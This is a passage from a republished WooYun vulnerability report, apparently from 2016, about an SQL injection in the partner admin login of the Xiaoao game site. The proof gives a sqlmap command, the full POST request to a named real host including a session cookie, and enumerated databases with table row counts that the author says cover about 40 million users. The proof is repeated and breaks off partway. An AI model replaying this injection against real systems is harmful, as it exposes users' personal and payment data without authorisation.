游戏安全之小奥游戏某漏洞涉及4000w用户信息

2017年5月1日13:01:03评论355 views字数 216阅读0分43秒阅读模式

摘要

2016-04-28：细节已通知厂商并且等待厂商处理中
2016-04-28：厂商已经确认，细节仅向厂商公开
2016-05-08：细节向核心白帽子及相关领域专家公开
2016-05-18：细节向普通白帽子公开
2016-05-28：细节向实习白帽子公开
2016-06-12：细节向公众公开

漏洞概要关注数(9) 关注此漏洞

缺陷编号： WooYun-2016-200866

漏洞标题：游戏安全之小奥游戏某漏洞涉及4000w用户信息

漏洞作者：黑色键盘丶

提交时间： 2016-04-28 13:32

公开时间： 2016-06-12 15:20

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

RT 4000w也算少的了哦

详细说明：

code 区域

跑了2天终于跑完了
 post注入语法：sqlmap.py -r 4.txt --dbs
 ======================post数据包==========================
 POST /admin/check.jsp HTTP/1.1
 Host: parter.xiaoao.com
 Proxy-Connection: keep-alive
 Content-Length: 51
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://parter.xiaoao.com
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded
 Referer: http://parter.xiaoao.com/admin/index.jsp
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: _yd_=GA1.2.336004051.1461422982; pgv_pvi=7771668480; pgv_si=s7674075136; Hm_lvt_23b43f151f7931858b76ec26af6984bc=1461422982; Hm_lpvt_23b43f151f7931858b76ec26af6984bc=1461436409; JSESSIONID=aaaFWWdzDdPDC6ahKzerv
 
 username=111&password=11111&submit.x=14&submit.y=33

数据库信息

code 区域

back-end DBMS: MySQL 5.0.12
 available databases [6]:
 [*] information_schema
 [*] mgame
 [*] mgame_history
 [*] mysql
 [*] performance_schema
 [*] test

当前库表信息

code 区域

Database: mgame
 +--------------------------------------+---------+
 | Table                                | Entries |
 +--------------------------------------+---------+
 | bbs_groupuser                        | 33644129 |
 | bbs_user_reg                         | 33544568 |
 | bbs_user_task                        | 24749567 |
 | game_ddz_robot                       | 21974068 |
 | game_cmcc2_userid                    | 20907703 |
 | game_my_daoju                        | 14031824 |
 | game_cmcc_black_phone                | 10736068 |
 | game_link_3g                         | 9618815 |
 | bbs_userprops_history_20150323       | 9299119 |
 | bbs_userprops                        | 8342156 |
 | user_friend                          | 6474638 |
 | bbs_user_sns                         | 6183532 |
 | bbs_user_alms                        | 5814224 |
 | temp_android_award                   | 5038208 |
 | game_farm3_signin_log                | 5024720 |
 | temp                                 | 4710672 |
 | bbs_user_guess                       | 4525518 |
 | bbs_user_activityinfo                | 4245347 |
 | error                                | 4069714 |
 | game_payjh                           | 3838160 |
 | game_car3d3_signin                   | 3403024 |
 | game_car3d3_madaoju_date_backup      | 3034339 |
 | game_farm3_signin                    | 2839860 |
 | temp_20151116                        | 2443040 |
 | android_game_ads_turn                | 2195904 |
 | bbs_user_activityinfo_log            | 2014150 |
 | bbs_user_rmb                         | 1834296 |
 | game_new_ddz_coupon                  | 1673133 |
 | game_car3d3_madaoju_backup           | 1531722 |
 | game_my_daoju_history                | 1363622 |
 | temp3                                | 1320536 |
 | user_dingdan_gold_ddz                | 1259031 |
 | game_achievement_user                | 1188502 |
 | game_car3d3_madaoju                  | 1174502 |
 | user_dingdan_ua                      | 1029374 |
 | user_task_log                        | 927720  |
 | xomoney_error                        | 907401  |
 | bbs_user_game_money_log              | 895435  |
 | card_type_log                        | 722162  |
 | game_qq_phoneno                      | 686492  |
 | bbs_message                          | 686490  |
 | game_user_history                    | 686223  |
 | android_ads_imei_download            | 683338  |
 | game_paycode                         | 676843  |
 | good_card_log                        | 675299  |
 | download_game_info                   | 644400  |
 | bbs_user_login_test                  | 637036  |
 | user_black                           | 620078  |
 | user_dingdan_bak                     | 618523  |
 | dingdan_check_list                   | 606347  |
 | game_new_ddz_coupon_log              | 601297  |
 | game_12114                           | 573064  |
 | game_car_user_aiindex                | 552608  |
 | temp_mm_smspush                      | 548471  |
 | game_user_invite                     | 535246  |
 | game_user_show_my_history            | 529619  |
 | user_dingdan_client_charge           | 493032  |
 | game_angel                           | 478934  |
 | game_car3d3_score                    | 475286  |
 | game_achievement_sh_card             | 471477  |
 | game_paycode_new                     | 450001  |
 | game_userscore_day_20160424          | 449519  |
 | game_userscore_day_20160422          | 449460  |
 | game_userscore_day_20160423          | 449394  |
 | game_userscore_day_20160421          | 449390  |
 | game_userscore_day_20160420          | 449286  |
 | game_userscore_day                   | 446216  |
 | user_dingdan_partermonth             | 435283  |
 | bbs_user_event                       | 428303  |
 | user_dingdan_imsi                    | 388295  |
 | user_charge                          | 379000  |
 | user_vip                             | 366707  |
 | game_user_cimelia                    | 365456  |
 | game_achievement_receive_present     | 339276  |
 | bbs_user_login                       | 323663  |
 | bbs_user_phone                       | 317582  |
 | game_user_imsi_phone                 | 300039  |
 | bbs_user_zone_visit                  | 288050  |
 | game_car3d3_friend                   | 286392  |
 | download_game_3g_info                | 282398  |
 | game_user_office                     | 271886  |
 | android_ads_visit_time_old           | 262334  |
 | user_dingdan_kong                    | 243628  |
 | game_online_count                    | 237882  |
 | game_car3d3_madaoju_date             | 229164  |
 | game_android_ddz_mm_code             | 227342  |
 | yyl_present_count                    | 226939  |
 | game_achievement_playwithone         | 222571  |
 | temp_fetion_award                    | 203352  |
 | yyl_bean_note                        | 191309  |
 | wap_online                           | 186878  |
 | yyl_bean                             | 183991  |
 | game_user_show_box                   | 181096  |
 | bbs_user_bank_history                | 179865  |
 | bbs_user_prestige                    | 177271  |
 | farm_user_task                       | 168575  |
 | game_motoonline_firstcharge_gift     | 163154  |
 | android_ads_click                    | 163013  |
 | bbs_user_round_match_auth            | 155937  |
 | user_dingdan_9588                    | 150898  |
 | game_bishai_score                    | 150714  |
 | user_dingdan_cmcc2                   | 150307  |
 | bbs_user_sheng                       | 146334  |
 | cmcc_phone_province                  | 145748  |
 | game_achievement_win                 | 141768  |
 | game_faction_score_history           | 140739  |
 | bbs_privatemsg                       | 138296  |
 | beiweibeta_buytools                  | 136921  |
 | game_new_ddz_content                 | 133321  |
 | game_answer                          | 124158  |
 | bbs_user_setitems                    | 122750  |
 | union_total                          | 122594  |
 | farm_user_land                       | 117008  |
 | mobilearea                           | 116688  |
 | game_ask                             | 116087  |
 | game_car3d3_award                    | 114813  |
 | reg_good_xo                          | 114050  |
 | game_hd_bx                           | 110976  |
 | game_new_sh_award                    | 109622  |
 | game_user_history_test               | 107825  |
 | user_dw                              | 106553  |
 | game_caronlie_madaoju                | 104756  |
 | bbs_user_history                     | 101120  |
 | bbs_userprops_history                | 101115  |
 | charge_third                         | 100817  |
 | game_ad_download_apk_user            | 99403   |
 | game_user_history_total_history      | 97359   |
 | game_userscore_history               | 96636   |
 | bbs_user_activityinfo_backup         | 96395   |
 | bbs_thread                           | 95408   |
 | xomoney                              | 95275   |
 | game_faction_bbs_message             | 94239   |
 | bbs_huitie                           | 92912   |
 | farm_repository                      | 91961   |
 | bbs_user_goldbean_log                | 88690   |
 | login_log                            | 86124   |
 | user_dingdan_cmcc_chargepoint        | 84256   |
 | game_order_wo                        | 82510   |
 | game_dingdan                         | 78995   |
 | fish_paycode_new                     | 78730   |
 | th_userlog                           | 74513   |
 | page_part_visite                     | 74267   |
 | bbs_free_modifyname                  | 72877   |
 | user_zz                              | 69499   |
 | user_dw_game                         | 67623   |
 | temp_fetion_code                     | 66889   |
 | user_dingdan_wap                     | 65221   |
 | bbs_user_onlinetime5                 | 65078   |
 | zdactive_present_count               | 63445   |
 | bbs_user_sendgamemoney               | 62951   |
 | user_dingdan_parterday_close         | 62797   |
 | bbs_log                              | 59987   |
 | user_dingdan_wapc                    | 55866   |
 | download_game_wukong_info            | 54584   |
 | luck_msg                             | 51021   |
 | game_android_ddz_mm_code_temp        | 50603   |
 | game_my_xo_wq_qp                     | 49269   |
 | sendmessagelist                      | 48941   |
 | xomoney_tt                           | 48855   |
 | game_link_new3g                      | 46446   |
 | e159                                 | 43984   |
 | game_new_motoonline_award            | 43682   |
 | bbs_user_zone_message                | 43075   |
 | game_faction_money_history           | 39300   |
 | game3_download                       | 38393   |
 | yyl_present_count_temp               | 38221   |
 | user_chattextlist                    | 38030   |
 | game_car3d3_signin_log               | 37494   |
 | temp_log                             | 36439   |
 | yyl_user_click                       | 36404   |
 | bbs_colony_event                     | 32944   |
 | user_pet_online                      | 32827   |
 | game_mydumpling                      | 32460   |
 | temp_fx_au                           | 32455   |
 | farm_user_lv_award                   | 31324   |
 | farm_user_lv                         | 30048   |
 | pet                                  | 28417   |
 | yeepay_card_log                      | 26032   |
 | bbs_user_spent_gold_log_20160423     | 25357   |
 | bbs_user_spent_gold_log_20160422     | 25081   |
 | error300                             | 24614   |
 | bbs_user_spent_gold_log_20160421     | 24319   |
 | bbs_user_spent_gold_log_20160420     | 23857   |
 | e159_ua                              | 23577   |
 | bbs_user_show_commend                | 22587   |
 | bbs_user_open                        | 22305   |
 | bbs_user_robot                       | 21673   |
 | bbs_user_robot1                      | 21673   |
 | game_autocharge_shenzhouxing_temp    | 21293   |
 | game_sddz_firstcharge_gift           | 20904   |
 | city_table                           | 20825   |
 | user_dingdan_yeepay_shenzhouxing     | 20194   |
 | game_album                           | 19063   |
 | game_all_online_count                | 18926   |
 | bbs_user_money_error                 | 18759   |
 | bbs_user_blog_visit                  | 18203   |
 | game_user_stage                      | 17809   |
 | game_user_stage_content              | 17794   |
 | bbs_bookmark                         | 17698   |
 | send_grow_pet_probability            | 16930   |
 | game_winmoney_userscore              | 16709   |
 | game_winxomoney                      | 16683   |
 | bbs_user_login_black_old             | 15946   |
 | pet_grow_log                         | 15850   |
 | game_faction_user                    | 15780   |
 | user_pet                             | 15683   |
 | game_photo                           | 15630   |
 | game_paycode_general                 | 15001   |
 | user_dingdan_mm                      | 13971   |
 | yyl_vip_click                        | 13439   |
 | game_autocharge_shenzhouxing_card    | 12805   |
 | user_dingdan_yeepay                  | 12749   |
 | game_autocharge_shenzhouxing_success | 12668   |
 | bbs_user_bank                        | 12667   |
 | game_sendsms                         | 12570   |
 | bbs_colony_member                    | 12217   |
 | game_activity_present                | 12093   |
 | charm_modify_history                 | 11621   |
 | inquiry                              | 11429   |
 | hd_cs                                | 11427   |
 | game_qq_pay_phoneno                  | 11121   |
 | user_dingdan_bank                    | 10916   |
 | user_pet_old                         | 10268   |
 | bbs_user_ddzpresent                  | 9568    |
 | user_dingdan_shenzhouxing            | 9513    |
 | user_detail                          | 9200    |
 | card_new                             | 9007    |
 | game_zhifubao_code                   | 8907    |
 | game_down_list                       | 8834    |
 | game_new_ddz_match                   | 8482    |
 | game_car3d3_friend1                  | 8263    |
 | user_dingdan_goldcpa                 | 7956    |
 | game_user_dayinfo_20160423           | 7833    |
 | szf_card_dingdan                     | 7427    |
 | parter_user                          | 7330    |
 | game_user_dayinfo_20160424           | 7288    |
 | card_type                            | 7076    |
 | game_union_phone_black               | 6934    |
 | temp_playp_u                         | 6451    |
 | user_reward                          | 6258    |
 | temp_t                               | 6015    |
 | game_user_dayinfo_20160422           | 5914    |
 | bbs_user_face                        | 5815    |
 | fish_paycode                         | 5655    |
 | bbs_user_mood                        | 5556    |
 | game_user_dayinfo_20160420           | 5446    |
 | user_action_event                    | 5442    |
 | bbs_user_blog_comment                | 5435    |
 | game_user_dayinfo_20160421           | 5223    |
 | bbs_user_blog                        | 5192    |
 | user_dingdan_checkoutrecord          | 4794    |
 | bbs_user_goldbean                    | 4690    |
 | oldddz_to_newddz_log                 | 4582    |
 | bbs_user_sendgold                    | 4345    |
 | temp_ba                              | 4322    |
 | bbs_17sy_log                         | 4256    |
 | android_resolution                   | 4254    |
 | user_level                           | 4159    |
 | prize_choice_num                     | 3913    |
 | user_dingdan_partermonth_close       | 3708    |
 | user_dingdan_gold_1028_20150108      | 3594    |
 | dingdan_yn_wapfee                    | 3591    |
 | user_dingdan_yeepay_jun              | 3509    |
 | bbs_integral                         | 3495    |
 | bbs_user_spent_gold_log              | 3457    |
 | bbs_award                            | 3134    |
 | user_dingdan_month                   | 3125    |
 | hd_souhu                             | 3124    |
 | dingdan_logout_list                  | 3121    |
 | game_user_job_function               | 3048    |
 | bbs_user_face_backup                 | 2891    |
 | bbs_colony_message                   | 2803    |
 | game_faction_job                     | 2780    |
 | user_charge_send                     | 2707    |
 | fish_paycode_log                     | 2657    |
 | user_dingdan_yeepay_card             | 2637    |
 | t                                    | 2632    |
 | bbs_sellxoid_list                    | 2608    |
 | user_dingdan_19pay                   | 2547    |
 | game_user_total                      | 2545    |
 | gamearticle                          | 2508    |
 | bbs_user_charm                       | 2486    |
 | game_photo_bbs                       | 2383    |
 | mission_message                      | 2345    |
 | farm_largess_log                     | 2324    |
 | game_android_ddz_award               | 2294    |
 | game_user_bomb                       | 2278    |
 | cdkey_liuyi                          | 2200    |
 | bbs_user_zone_set                    | 2198    |
 | xomoney_t                            | 2185    |
 | upload_score                         | 2161    |
 | user_add_log                         | 2158    |
 | send_present_msg                     | 2144    |
 | bbs_colony_thread                    | 2128    |
 | game_hd_bx_click_date                | 2102    |
 | dingdan_check                        | 2064    |
 | game_album_status                    | 2063    |
 | game_save                            | 2063    |
 | game_qth_s                           | 2056    |
 | user_dingdan_95cool                  | 2014    |
 | littlefish_cdkey                     | 2000    |
 | bbs_user_match_auth                  | 1960    |
 | address_ip                           | 1940    |
 | bbs_colony_share                     | 1766    |
 | game_faction_user_function           | 1749    |
 | game_server_list                     | 1749    |
 | game_down                            | 1707    |
 | game_speaker                         | 1700    |
 | game_faction_placard                 | 1682    |
 | game_faction_user_message            | 1654    |
 | game_tanwei                          | 1649    |
 | delete_friend                        | 1641    |
 | bbs_user_chat                        | 1627    |
 | game_new_ddz_match_award             | 1610    |
 | game_user_dayinfo                    | 1570    |
 | player                               | 1508    |
 | world_cup_user                       | 1499    |
 | game_faction                         | 1485    |
 | bbs_head_log                         | 1458    |
 | bbs_user_test                        | 1369    |
 | game_bishai_table                    | 1354    |
 | game_upload_reg                      | 1351    |
 | game_user_buy_food                   | 1314    |
 | user_inquiry                         | 1250    |
 | game_union_city_black                | 1225    |
 | bbs_user_share                       | 1195    |
 | bank_remit                           | 1189    |
 | bbs_colony_photo                     | 1105    |
 | game_user_cheat                      | 1045    |
 | bbs_user_sendgold_day                | 1039    |
 | user_black_super                     | 1027    |
 | bbs_friend                           | 1005    |
 | game_farm3_award360_code             | 1000    |
 | game_zjh_code                        | 1000    |
 | game_farm3_award360                  | 990     |
 | game_user_pet_life                   | 915     |
 | temp0                                | 906     |
 | game_create_cimelia                  | 903     |
 | bbs_user_null                        | 850     |
 | game_union_province_count            | 845     |
 | www_article                          | 825     |
 | movie_list_history                   | 821     |
 | game_ddz_statistics2                 | 801     |
 | game_my_wq_qp                        | 789     |
 | inquiry_new                          | 769     |
 | game_phone_list                      | 735     |
 | game_new_ddz_award_20160421          | 717     |
 | bbs_user_subscription                | 716     |
 | temp_qq_au                           | 714     |
 | prize_week                           | 707     |
 | bbs_user_my_show                     | 706     |
 | game_faction_chat                    | 706     |
 | bbs_sellxoid                         | 703     |
 | game_winmoney_pool                   | 696     |
 | bbs_updname_log                      | 674     |
 | bishai_usexomoney                    | 665     |
 | windows_down                         | 657     |
 | game_new_ddz_award_20160422          | 653     |
 | game_new_ddz_award_20160423          | 634     |
 | user_dingdan_gold_postdbo            | 632     |
 | activity_pl3_log                     | 622     |
 | send_show_log                        | 608     |
 | game_new_ddz_award_20160424          | 603     |
 | yyl_present_count_new                | 555     |
 | farm_user_use_fertilizer             | 542     |
 | game_tuij                            | 529     |
 | game_new_ddz_award_20160420          | 528     |
 | user_report                          | 523     |
 | bbs_recommend_blog                   | 514     |
 | game_shanghai_chinajoy               | 500     |
 | game_server_list_norun               | 457     |
 | worldcup_buy                         | 420     |
 | phonetype                            | 405     |
 | bbs_user_login_fail_ip               | 404     |
 | zjh_top100_charisma                  | 400     |
 | parter_finance_setup                 | 395     |
 | game_weblink_count                   | 375     |
 | game_autocharge_shenzhouxing_config  | 351     |
 | union_bl                             | 344     |
 | bbs_share_talk                       | 341     |
 | game_my_tanwei                       | 330     |
 | chargeinfo                           | 328     |
 | bbs_user_img                         | 327     |
 | message_send                         | 324     |
 | mission_thread                       | 320     |
 | bbs_share_disk                       | 318     |
 | chargeinfo_test                      | 316     |
 | bbs_recommend_photo                  | 280     |
 | game_ad_download_apk                 | 260     |
 | union_pay                            | 255     |
 | game_speaker_count                   | 252     |
 | temperror                            | 251     |
 | dingdan_yn_wap                       | 248     |
 | fish_paycode_use_imei                | 246     |
 | game_achievement_playwith3friend     | 241     |
 | bbs_star_user                        | 238     |
 | bbs_user_colony                      | 225     |
 | game_activity_list                   | 221     |
 | game_link_count                      | 210     |
 | xo_gm_link                           | 200     |
 | zjh_top100_allmoney                  | 200     |
 | game_cmccboxmj_daoju                 | 194     |
 | user_friend_kind                     | 193     |
 | bbs_addvip                           | 191     |
 | dopod_reg                            | 191     |
 | game_new_ddz_award                   | 187     |
 | game_dingdan_new                     | 185     |
 | active_click_count                   | 184     |
 | user_dingdan_check_black             | 184     |
 | game_achievement_match_win           | 180     |
 | bbs_user_show                        | 173     |
 | basic_menu                           | 170     |
 | bbs_photo_talk                       | 169     |
 | union_pay_info                       | 167     |
 | pay_jisuan                           | 157     |
 | car3d3_gdgrps                        | 155     |
 | bbs_user_match_auth_qht              | 152     |
 | bbs_usersign                         | 151     |
 | game_bishai_umpire                   | 139     |
 | buy_show                             | 135     |
 | bbs_colony_placard                   | 127     |
 | bbs_user_day_match_auth1             | 126     |
 | bbs_user_gold_game_top               | 125     |
 | game_user_show_type                  | 122     |
 | bbs_user_goldbean_today_num          | 120     |
 | game_union_code                      | 119     |
 | bbs_attachment                       | 114     |
 | bbs_groupperm                        | 110     |
 | bbs_user_face_log                    | 101     |
 | temp_alipay_sendmoney                | 101     |
 | bbs_message_hot                      | 100     |
 | game_achievement_type                | 100     |
 | android_ads                          | 97      |
 | temp_r                               | 95      |
 | www_game_info                        | 94      |
 | buy_mingxi                           | 93      |
 | en_www_game_info                     | 93      |
 | game_cimelia_type                    | 92      |
 | bbs_user_bbs_black                   | 90      |
 | bbs_user_sns_history                 | 89      |
 | user_dingdan_month_old               | 88      |
 | www_hr_ryxx                          | 88      |
 | game                                 | 85      |
 | game_daoju_type                      | 76      |
 | buy                                  | 75      |
 | farm_plant_pic                       | 75      |
 | bbs_shajia_sell                      | 74      |
 | en_game                              | 70      |
 | temp2                                | 69      |
 | bbs_game_gifts                       | 68      |
 | user_receive_mail                    | 67      |
 | farm_product                         | 66      |
 | game_pay_fail_ip                     | 64      |
 | gamecheck                            | 64      |
 | world_cup_match                      | 64      |
 | reluserinfo                          | 59      |
 | bbs_shajia_history                   | 58      |
 | bbs_userperm                         | 58      |
 | card_type_new                        | 56      |
 | game_ask_question_type_relation      | 56      |
 | fish_paycode_use                     | 55      |
 | game_qth_day_award                   | 54      |
 | hd_klwj                              | 54      |
 | yuanbao_shua                         | 52      |
 | farm_user_lv_dictionary              | 51      |
 | game_union_17sy                      | 50      |
 | bbs_addvipinfo                       | 49      |
 | bbs_moderator                        | 48      |
 | web_wtbk                             | 47      |
 | game_union_province_limit            | 45      |
 | stop_union                           | 45      |
 | user_dingdan_gold_test               | 45      |
 | user_jiang                           | 44      |
 | game_money_type                      | 43      |
 | game_ip_address                      | 41      |
 | bbs_user_show_all                    | 40      |
 | game_car3d3_madaoju_use              | 40      |
 | test1                                | 40      |
 | user_dingdan_iava                    | 38      |
 | game_faction_pk_list                 | 37      |
 | temp4                                | 37      |
 | bbs_board                            | 35      |
 | www_autothink_lm                     | 35      |
 | www_hr                               | 34      |
 | bbs_face                             | 33      |
 | game_faction_pk                      | 33      |
 | hd_duobao                            | 33      |
 | user_pet_pic                         | 33      |
 | suggest                              | 31      |
 | dj_down                              | 30      |
 | game_wq_qp                           | 29      |
 | game_server_listex                   | 28      |
 | game_server_room_list                | 28      |
 | gamewin_mingxi                       | 28      |
 | wap_content                          | 27      |
 | game_server_listex_ophone            | 26      |
 | privilege_img_info                   | 26      |
 | test                                 | 26      |
 | farm_plant_dictionary                | 25      |
 | fish_paycode_use_imei_new            | 24      |
 | game_caronlie_madaoju_use            | 24      |
 | game_motoonlie_madaoju_use           | 24      |
 | game_name                            | 24      |
 | product_type                         | 24      |
 | bbs_user_motocarsingle               | 23      |
 | game3gmax                            | 23      |
 | game3gmaxver                         | 23      |
 | game_link_new3gname                  | 23      |
 | temp_yunnan_match_score              | 23      |
 | user_dingdan_test1                   | 23      |
 | user_tips                            | 23      |
 | user_zd_present                      | 23      |
 | prms_userprms                        | 22      |
 | power_dictionary                     | 21      |
 | union_b2                             | 21      |
 | user_power_relation                  | 21      |
 | game_server_list_memo                | 20      |
 | basic_user                           | 19      |
 | game_type                            | 19      |
 | bbs_bbsnews                          | 18      |
 | game_infor                           | 18      |
 | www_autothink_content                | 18      |
 | contact                              | 17      |
 | game_apk_info_union                  | 17      |
 | bbs_game_propsinfo                   | 16      |
 | beiweibeta_charge                    | 16      |
 | singlegame_ask                       | 16      |
 | dj_down_total_user                   | 15      |
 | en_www_article                       | 15      |
 | system_lv_dictionary                 | 15      |
 | game_apk_info                        | 14      |
 | game_intro_pic                       | 14      |
 | farm_task                            | 13      |
 | fixturenum                           | 13      |
 | user_send_mail                       | 13      |
 | zd_present                           | 13      |
 | game_server_listex_iava              | 12      |
 | movie_list                           | 12      |
 | privilege_img_configs                | 12      |
 | user_dingpiao_movie                  | 12      |
 | bbs_colony_type                      | 11      |
 | prize_luck_num                       | 11      |
 | temp_ddz_zbs                         | 11      |
 | bbs_user_action                      | 10      |
 | game_cmccboxmj_daoju_show            | 10      |
 | good_xo                              | 10      |
 | privilege_img_config                 | 10      |
 | apple_login_sendmoney                | 9       |
 | farm_product_type                    | 9       |
 | question                             | 9       |
 | upload_score2                        | 9       |
 | user_tips_type                       | 9       |
 | yyl_present                          | 9       |
 | beiweibeta_tools                     | 8       |
 | game_office                          | 8       |
 | game_scoreintegral                   | 8       |
 | game_user_honor                      | 8       |
 | union_kou                            | 8       |
 | android_imei_game                    | 7       |
 | bbs_user_goldbean_phone              | 7       |
 | farm_land_lv_dictionary              | 7       |
 | game_real_server_new                 | 7       |
 | game_vip_type                        | 7       |
 | pet_active_get                       | 7       |
 | user_pet_active_type                 | 7       |
 | yyl_present_new                      | 7       |
 | bbs_user_gold_game                   | 6       |
 | farm_fertilizer                      | 6       |
 | game_faction_function                | 6       |
 | game_group                           | 6       |
 | game_real_server_android_old         | 6       |
 | game_server_room_list_test           | 6       |
 | t_random_image                       | 6       |
 | union_danji                          | 6       |
 | `3g_game_bbs`                        | 5       |
 | ddz_charge_filer                     | 5       |
 | game_cimelia_charm                   | 5       |
 | game_real_server                     | 5       |
 | game_real_server_old                 | 5       |
 | otherinfo                            | 5       |
 | t_userdir                            | 5       |
 | user_pet_grow_condition              | 5       |
 | web_xtpz                             | 5       |
 | bbs_color                            | 4       |
 | bbs_user_indulge                     | 4       |
 | en_t_random_image                    | 4       |
 | game_daoju_type_list                 | 4       |
 | game_group_iava                      | 4       |
 | game_union                           | 4       |
 | gamechat                             | 4       |
 | inquiry_user                         | 4       |
 | system_mode_dictionary               | 4       |
 | temp1                                | 4       |
 | user_dingdan_zytx                    | 4       |
 | bbs_user_prestige_history            | 3       |
 | ddz_activity_info                    | 3       |
 | game_answer_score                    | 3       |
 | game_car3d3_supertrack               | 3       |
 | game_cmcc_mj_faction_user            | 3       |
 | game_union_companion                 | 3       |
 | superplayer                          | 3       |
 | union_zc_fc_bl                       | 3       |
 | activeinfo                           | 2       |
 | bbs_advertisement                    | 2       |
 | bbs_vote                             | 2       |
 | game_group_mm                        | 2       |
 | phone_test                           | 2       |
 | prize_pool                           | 2       |
 | push_9588                            | 2       |
 | question_type                        | 2       |
 | user_mail_address                    | 2       |
 | activty_info                         | 1       |
 | bbs_boardcommunity                   | 1       |
 | bbs_config                           | 1       |
 | bbs_user_login_fail                  | 1       |
 | beiweibeta_set                       | 1       |
 | check_server                         | 1       |
 | clientversion                        | 1       |
 | game_bbs                             | 1       |
 | game_bbs_3g                          | 1       |
 | game_bbs_3g_box                      | 1       |
 | game_bbs_box                         | 1       |
 | game_daoju_product                   | 1       |
 | game_ddz_statistics                  | 1       |
 | game_hd_bx_click                     | 1       |
 | game_pet_food                        | 1       |
 | game_replaceword                     | 1       |
 | game_server_room_list_close          | 1       |
 | game_switch                          | 1       |
 | game_switch_test                     | 1       |
 | game_version                         | 1       |
 | game_zjh_xyc                         | 1       |
 | game_zjh_xyc_set                     | 1       |
 | game_zjh_xyc_user_xz                 | 1       |
 | gamedaojuservletid                   | 1       |
 | gameinfo                             | 1       |
 | luck_time                            | 1       |
 | prize_luck_config                    | 1       |
 | send_message_test                    | 1       |
 | user_dingdan_charge                  | 1       |
 | user_dingdan_cmcc                    | 1       |
 | user_dingdan_km                      | 1       |
 | usercheckservletuid                  | 1       |
 | win                                  | 1       |
 | yyl_click_count                      | 1       |
 | zd_count_dictionary                  | 1       |
 +--------------------------------------+---------+

这里是33644129用户信息+论坛6183532 也就4000w

漏洞证明：

code 区域

跑了2天终于跑完了
 post注入语法：sqlmap.py -r 4.txt --dbs
 ======================post数据包==========================
 POST /admin/check.jsp HTTP/1.1
 Host: parter.xiaoao.com
 Proxy-Connection: keep-alive
 Content-Length: 51
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://parter.xiaoao.com
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded
 Referer: http://parter.xiaoao.com/admin/index.jsp
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: _yd_=GA1.2.336004051.1461422982; pgv_pvi=7771668480; pgv_si=s7674075136; Hm_lvt_23b43f151f7931858b76ec26af6984bc=1461422982; Hm_lpvt_23b43f151f7931858b76ec26af6984bc=1461436409; JSESSIONID=aaaFWWdzDdPDC6ahKzerv
 
 username=111&password=11111&submit.x=14&submit.y=33

数据库信息

code 区域

back-end DBMS: MySQL 5.0.12
 available databases [6]:
 [*] information_schema
 [*] mgame
 [*] mgame_history
 [*] mysql
 [*] performance_schema
 [*] test

当前库表信息

code 区域

Database: mgame
 +--------------------------------------+---------+
 | Table                                | Entries |
 +--------------------------------------+---------+
 | bbs_groupuser                        | 33644129 |
 | bbs_user_reg                         | 33544568 |
 | bbs_user_task                        | 24749567 |
 | game_ddz_robot                       | 21974068 |
 | game_cmcc2_userid                    | 20907703 |
 | game_my_daoju                        | 14031824 |
 | game_cmcc_black_phone                | 10736068 |
 | game_link_3g                         | 9618815 |
 | bbs_userprops_history_20150323       | 9299119 |
 | bbs_userprops                        | 8342156 |
 | user_friend                          | 6474638 |
 | bbs_user_sns                         | 6183532 |
 | bbs_user_alms                        | 5814224 |
 | temp_android_award                   | 5038208 |
 | game_farm3_signin_log                | 5024720 |
 | temp                                 | 4710672 |
 | bbs_user_guess                       | 4525518 |
 | bbs_user_activityinfo                | 4245347 |
 | error                                | 4069714 |
 | game_payjh                           | 3838160 |
 | game_car3d3_signin                   | 3403024 |
 | game_car3d3_madaoju_date_backup      | 3034339 |
 | game_farm3_signin                    | 2839860 |
 | temp_20151116                        | 2443040 |
 | android_game_ads_turn                | 2195904 |
 | bbs_user_activityinfo_log            | 2014150 |
 | bbs_user_rmb                         | 1834296 |
 | game_new_ddz_coupon                  | 1673133 |
 | game_car3d3_madaoju_backup           | 1531722 |
 | game_my_daoju_history                | 1363622 |
 | temp3                                | 1320536 |
 | user_dingdan_gold_ddz                | 1259031 |
 | game_achievement_user                | 1188502 |
 | game_car3d3_madaoju                  | 1174502 |
 | user_dingdan_ua                      | 1029374 |
 | user_task_log                        | 927720  |
 | xomoney_error                        | 907401  |
 | bbs_user_game_money_log              | 895435  |
 | card_type_log                        | 722162  |
 | game_qq_phoneno                      | 686492  |
 | bbs_message                          | 686490  |
 | game_user_history                    | 686223  |
 | android_ads_imei_download            | 683338  |
 | game_paycode                         | 676843  |
 | good_card_log                        | 675299  |
 | download_game_info                   | 644400  |
 | bbs_user_login_test                  | 637036  |
 | user_black                           | 620078  |
 | user_dingdan_bak                     | 618523  |
 | dingdan_check_list                   | 606347  |
 | game_new_ddz_coupon_log              | 601297  |
 | game_12114                           | 573064  |
 | game_car_user_aiindex                | 552608  |
 | temp_mm_smspush                      | 548471  |
 | game_user_invite                     | 535246  |
 | game_user_show_my_history            | 529619  |
 | user_dingdan_client_charge           | 493032  |
 | game_angel                           | 478934  |
 | game_car3d3_score                    | 475286  |
 | game_achievement_sh_card             | 471477  |
 | game_paycode_new                     | 450001  |
 | game_userscore_day_20160424          | 449519  |
 | game_userscore_day_20160422          | 449460  |
 | game_userscore_day_20160423          | 449394  |
 | game_userscore_day_20160421          | 449390  |
 | game_userscore_day_20160420          | 449286  |
 | game_userscore_day                   | 446216  |
 | user_dingdan_partermonth             | 435283  |
 | bbs_user_event                       | 428303  |
 | user_dingdan_imsi                    | 388295  |
 | user_charge                          | 379000  |
 | user_vip                             | 366707  |
 | game_user_cimelia                    | 365456  |
